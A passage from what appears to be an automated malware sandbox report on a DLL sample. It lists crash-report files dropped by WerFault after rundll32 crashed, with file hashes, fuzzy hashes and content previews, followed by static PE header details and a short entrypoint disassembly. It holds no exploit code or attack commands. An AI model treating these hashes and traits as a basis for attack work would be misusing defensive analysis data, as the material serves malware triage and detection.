Entropy (8bit): 3.7639943799025555
Encrypted: false
SSDEEP: 192:r+iX0oX1HBUZMX4jed+5/u7saS274It7cEP:6ipXlBUZMX4jeU/u7saX4It7cEP
MD5: D70C550DA76D4F808A527773BECBB074
SHA1: B25F1C1DA411A3DCEF49B73BC09C54F7B1314AA1
SHA-256: DBA73B5AA4F095E9E528110B199DB20D16FEC947A77D6739678BF8C829B13B9A
SHA-512: 96B6A44FF34FCC16DB3768D84CD9EFD9CA382BEE893F0EF581090249BEB3B40C090C1255D7E1519192D6639ED7F4B6FDA4608B77F0D07C91FB4F03A0F64EF57E
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.1.4.2.0.5.1.5.1.7.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.1.4.3.7.1.7.1.3.9.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.5.7.a.a.e.5.-.d.d.5.a.-.4.b.8.d.-.9.5.4.a.-.b.b.b.2.5.9.4.d.f.f.f.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.7.b.0.9.0.d.-.3.f.7.c.-.4.9.e.8.-.a.f.6.0.-.4.e.f.1.c.4.8.f.4.d.0.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.4.8.-.0.0.0.1.-.0.0.1.6.-.5.a.4.7.-.8.c.c.9.2.c.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_69688d2812e06195cef530d1f4e704d7e967697_82810a17_0958cc8c\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 12044
Entropy (8bit): 3.7651467727075087
Encrypted: false
SSDEEP: 192:23ihS0oXqHBUZMX4jed+5/u7saS274It7cx:2iyXCBUZMX4jeU/u7saX4It7cx
MD5: 0A3EA743E9398450836E8532348F36CC
SHA1: 33729B785B208ACA681F2DF8549CBFE1B8532C85
SHA-256: F090C9D54A4A54E7891B1E71D7C2689704CB0B2CCBE13E5353B9AF4071BBD4AD
SHA-512: E4A2DA4BACD71789C3D853D45F59E7991E83455952302536B38EBC4AD4A44149C7153A1D374ABBF064D4F791F901D86FE9563A18B0C906485A084AA7536892A1
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.1.4.2.9.7.4.9.3.2.6.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.1.4.4.5.5.9.3.0.4.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.3.0.3.1.1.9.-.3.b.b.f.-.4.b.e.e.-.8.2.5.7.-.4.6.4.a.1.5.1.8.8.5.a.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.3.f.6.3.3.9.-.6.d.c.7.-.4.2.f.c.-.8.6.4.4.-.b.0.5.f.5.b.8.5.e.f.f.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.f.0.-.0.0.0.1.-.0.0.1.6.-.9.e.b.d.-.4.6.c.e.2.c.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER618E.tmp.dmp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Tue Oct 12 05:50:24 2021, 0x1205a4 type
Category: dropped
Size (bytes): 35728
Entropy (8bit): 2.3895420553113427
Encrypted: false
SSDEEP: 192:QEcWzMrXhUhWtMdHuIQLGSV2gDXC7pVjepVSUnyfzLzn:wWzMNUw2dHYLRV9S7pJe+UmXn
MD5: C980BDF6B563D30FA312FD9BF6191F93
SHA1: A451988E0042DAB59BD4D52EC5312CBCB9FD969C
SHA-256: 48ADC678ADA085ED6794FAAA554FD49664350BFFBDEAFE633BF13BA0E324BE66
SHA-512: AF338840302787068FB203A2D7A35476D9F0E3778A60F666A12B0340D5A2C1B531D84072633F38E66A0051584445A75E25F5B754F269995D276040099330856E
Malicious: false
Preview: MDMP....... ....... "ea...................U...........B..............GenuineIntelW...........T............!ea"............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER641E.tmp.dmp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Tue Oct 12 05:50:27 2021, 0x1205a4 type
Category: dropped
Size (bytes): 33944
Entropy (8bit): 2.4971407466657674
Encrypted: false
SSDEEP: 192:MqbUQaZobrmnWtMdHuIQLGSw7KJBJFC418LfVnuXi:WMbt2dHYLRw8LQw8RuXi
MD5: ED1E5F7A96BD8C5678207BB626E3B182
SHA1: 5FF459096BE638E25946DA755E3B42C8BADEEE73
SHA-256: CFF33D2F88999800F4CB2B160AE186D60D4AC94B582D92A6FF0EC16AD2429482
SHA-512: F369CBEC9506EDFD281F8E40ED243325D553CF0118A6F880FF37E99B3F405B913A1DEE420ADDA1DB560851B62A319EFBED9CF980C6EE0F39C55C5EADEEE795F8
Malicious: false
Preview: MDMP....... .......#"ea...................U...........B..............GenuineIntelW...........T.......H....!ea"............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER78C0.tmp.WERInternalMetadata.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 8410
Entropy (8bit): 3.6978573974817097
Encrypted: false
SSDEEP: 192:Rrl7r3GLNiHn6nq96Y+k63gmf8dSPCprx89bNasfivm:RrlsNiH6q96Yd63gmf8dS5N5fz
MD5: 1DA794412F26C38602614685A8EE012A
SHA1: D3809FC946708E94D4C26AA87AB3A0F63D8DA902
SHA-256: 5247CB378F8D8ED99506A57FE11CAC96B9A1852A2861162053B0B609B65FE16D
SHA-512: 78568E371F6E42A35E97581B03EF545C9C1CF2E2B227B51DCA0D76234224AD02939EE09D0D44C1C22432D764BB39585A1CC61E56FE68FBD1A31B767943BAE2EE
Malicious: false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.4.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D74.tmp.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4771
Entropy (8bit): 4.480321171931333
Encrypted: false
SSDEEP: 48:cvIwSD8zspJgtWI90yWSC8Bs8fm8M4JCdsjMFXy+q8vjsjNc34SrS8ad:uITf7nTSN/JJ2yKONc3DW/d
MD5: C33A482127B7209EF51325AC96C085D2
SHA1: 7E03254FA9071E6EB0A880248E3861CCF9725C06
SHA-256: 35F6DC0BD6946C69214D132B5212A5C3C22C3DC3576567042E006EADDC1009A7
SHA-512: F244067052BA64DE48D46B2469932A6723D48B73B38E9B6F04DAFA6839F1ED5CC76764F1831CDAE62EF0EAF4C51ED329F6F5DE2DA2D204B3F0420FB624F9C1D1
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206181" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER7EEA.tmp.WERInternalMetadata.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8410
                                                                                          Entropy (8bit):3.698928902317836
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Rrl7r3GLNinR6/o6Y+W63gmf8dSPCprp89bEssfpsm:RrlsNiR6/o6Yf63gmf8dSRE/f3
                                                                                          MD5:4C0A64AF5A4E98C589035B3D6D31758A
                                                                                          SHA1:6AAD8DFB5F4E8987147668F43141380038B7F327
                                                                                          SHA-256:065C35A21B6A897FE8122FB194D355F5A121FD9D1D46E5CEC6F006BFB58CB374
                                                                                          SHA-512:3BDFD7FBEE619CC1340B35531A458988664BE9B2A55F0ECEDACAA7313AD8A417831854DE5A6EC7C56B13840149C11189C7D8DE736955CBE759A0A60B75A9BC3B
                                                                                          Malicious:false
                                                                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.8.0.<./.P.i.d.>.......
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER861F.tmp.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4771
                                                                                          Entropy (8bit):4.481061523546041
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cvIwSD8zspJgtWI90yWSC8BN8fm8M4JCdsjMFpo+q8vjsjG4SrS5d:uITf7nTSNsJJ0oKOGDW5d
                                                                                          MD5:664B4582229AD3ECE4BEBC614E508369
                                                                                          SHA1:5238FF8643575C4C09BA5C30A1D8D61E5A15EBF2
                                                                                          SHA-256:B0742289DDACB40DBF830E5308EC88FB4CEBFE03E4BDE54992708EDCB5D0750A
                                                                                          SHA-512:155C2A3A298996007A5D9696F8FEE6AB3AFA77B70519348123B83D5AA869A5DCC4FF49715F7D27D8D9F041471278AAA6860AC156F5C5E7031D3CFA864735D195
                                                                                          Malicious:false
                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206181" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER8830.tmp.dmp
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 05:50:34 2021, 0x1205a4 type
                                                                                          Category:dropped
                                                                                          Size (bytes):35442
                                                                                          Entropy (8bit):2.388382779654516
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:p1l+vWtMdHuIQLGSLLgL95JQGFW1l6c6nwpIAS:7l+e2dHYLRLQ97QKW1lg63S
                                                                                          MD5:8E3A91DE6D34C6B37A18863FC52FD781
                                                                                          SHA1:F4ABB52DC5D993F6B3C7FAC44FDBCB595A6E1945
                                                                                          SHA-256:DBF4090005CFA672CDE2A08892B07517D70AE5BF79682A0C860BC3A403E14033
                                                                                          SHA-512:69A66C9220261386403D262E8D396AC68EB59E9910CB9D8D170C1B5218AC2625B9EFFBE2C114B1C1E8858C8BA89902628A20005FF5D38C0CF9DB1EF2803CBB9E
                                                                                          Malicious:false
                                                                                          Preview: MDMP....... .......*"ea...................U...........B..............GenuineIntelW...........T............!ea!............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D40.tmp.WERInternalMetadata.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8406
                                                                                          Entropy (8bit):3.6991459004086367
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Rrl7r3GLNi9M06e6Y+b63gmf8dSPCprc89bX9sfAdm:RrlsNiP6e6Yy63gmf8dSOX2fX
                                                                                          MD5:EC2B0AB20C4D7D29A40FA0B7F2CEFB08
                                                                                          SHA1:C3E1BE92C6AD26216F7716C7435AF8D02097BAE7
                                                                                          SHA-256:179E9395CFD91EA03A0C11DC8F20B5D00C16A50BCEC678880E0003CCB42FD713
                                                                                          SHA-512:4E14D4F39966D4DD4F54946F6B90079C674B3D3EE7588295B13E0CCD2FBD0C17E8FE7949BB245C0D63424074372B51F705237BB27333A4F88B3D31283881A389
                                                                                          Malicious:false
                                                                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.0.5.6.<./.P.i.d.>.......
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERA35B.tmp.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4771
                                                                                          Entropy (8bit):4.481644751827183
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cvIwSD8zspJgtWI90yWSC8BULs8fm8M4JCdsjMFxSV+q8vjsj74SrS6d:uITf7nTSNOLRJJGcKO7DW6d
                                                                                          MD5:C31A63EB601F08250D9259422447EF2D
                                                                                          SHA1:0A24CAF93C43688624BC5D8CE60C71C94A9728E9
                                                                                          SHA-256:2CFB01390B883D688A8746DBE48DE7B3586C184BE46B61229C3C9A337E00E951
                                                                                          SHA-512:0E970114A231C8D777D6C1AD7929AF8CDA8B5E3203483ABD5A51F74CFA5DA65C6E8DFB9B01E42814C76FA774EB96086D9E3E425B994726F93ED3591B8906977D
                                                                                          Malicious:false
                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206181" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):6.669873789159674
                                                                                          TrID:
                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                          • DOS Executable Generic (2002/1) 0.20%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:6yDD19jMIu.dll
                                                                                          File size:718336
                                                                                          MD5:903cf677ba834a968b42bd71e4626a9d
                                                                                          SHA1:c751f3ab4612917d15967fc1f0591e674c2e56ca
                                                                                          SHA256:b601a3c9c3a3df9043ea82733f1da5b413207d7585ca6b18baa8a4d923ce92d8
                                                                                          SHA512:b81d6b419c05ac351d086ab9d439b7cf2d8db21208f85b13e483bacb800a811890ca7fc3ce2295d2861f3323b0d52725e27f42758ef4ec6312018b4a7a249095
                                                                                          SSDEEP:12288:1UAQSx16fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsF:1z3x16fq8Np6bTPPaBreaZlYCOSVol2S
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................."w|.............].......].......]......."wf.............].......].......]...............].......Rich...........

                                                                                          File Icon

                                                                                          Icon Hash:74f0e4ecccdce0e4

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x1003ab77
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x10000000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                          Time Stamp:0x5F6FF725 [Sun Sep 27 02:21:25 2020 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:6
                                                                                          OS Version Minor:0
                                                                                          File Version Major:6
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:6
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:b5c6badd398e2e3aa283a40a40432c6c

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          cmp dword ptr [ebp+0Ch], 01h
                                                                                          jne 00007F0B1092C057h
                                                                                          call 00007F0B1092CB42h
                                                                                          push dword ptr [ebp+10h]
                                                                                          push dword ptr [ebp+0Ch]
                                                                                          push dword ptr [ebp+08h]
                                                                                          call 00007F0B1092BEFAh
                                                                                          add esp, 0Ch
                                                                                          pop ebp
                                                                                          retn 000Ch
                                                                                          mov ecx, dword ptr [ebp-0Ch]
                                                                                          mov dword ptr fs:[00000000h], ecx
                                                                                          pop ecx
                                                                                          pop edi
                                                                                          pop edi
                                                                                          pop esi
                                                                                          pop ebx
                                                                                          mov esp, ebp
                                                                                          pop ebp
                                                                                          push ecx
                                                                                          ret
                                                                                          mov ecx, dword ptr [ebp-10h]
                                                                                          xor ecx, ebp
                                                                                          call 00007F0B1092BC53h
                                                                                          jmp 00007F0B1092C030h
                                                                                          mov ecx, dword ptr [ebp-14h]
                                                                                          xor ecx, ebp
                                                                                          call 00007F0B1092BC42h
                                                                                          jmp 00007F0B1092C01Fh
                                                                                          push eax
                                                                                          push dword ptr fs:[00000000h]
                                                                                          lea eax, dword ptr [esp+0Ch]
                                                                                          sub esp, dword ptr [esp+0Ch]
                                                                                          push ebx
                                                                                          push esi
                                                                                          push edi
                                                                                          mov dword ptr [eax], ebp
                                                                                          mov ebp, eax
                                                                                          mov eax, dword ptr [100AA0D4h]
                                                                                          xor eax, ebp
                                                                                          push eax
                                                                                          push dword ptr [ebp-04h]
                                                                                          mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                          ret
                                                                                          push eax
                                                                                          push dword ptr fs:[00000000h]
                                                                                          lea eax, dword ptr [esp+0Ch]
                                                                                          sub esp, dword ptr [esp+0Ch]
                                                                                          push ebx
                                                                                          push esi
                                                                                          push edi
                                                                                          mov dword ptr [eax], ebp
                                                                                          mov ebp, eax
                                                                                          mov eax, dword ptr [100AA0D4h]
                                                                                          xor eax, ebp
                                                                                          push eax
                                                                                          mov dword ptr [ebp-10h], eax
                                                                                          push dword ptr [ebp-04h]
                                                                                          mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                          ret
                                                                                          push eax
                                                                                          inc dword ptr fs:[eax]

                                                                                          Data Directories

                                                                                          Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT          0xa8990          0x80          .rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT          0xa8a10          0x50          .rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC       0x146000         0x53d0        .reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG           0xa474c          0x54          .rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xa47a0          0x40          .rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT             0x7b000          0x1fc         .rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                          Sections

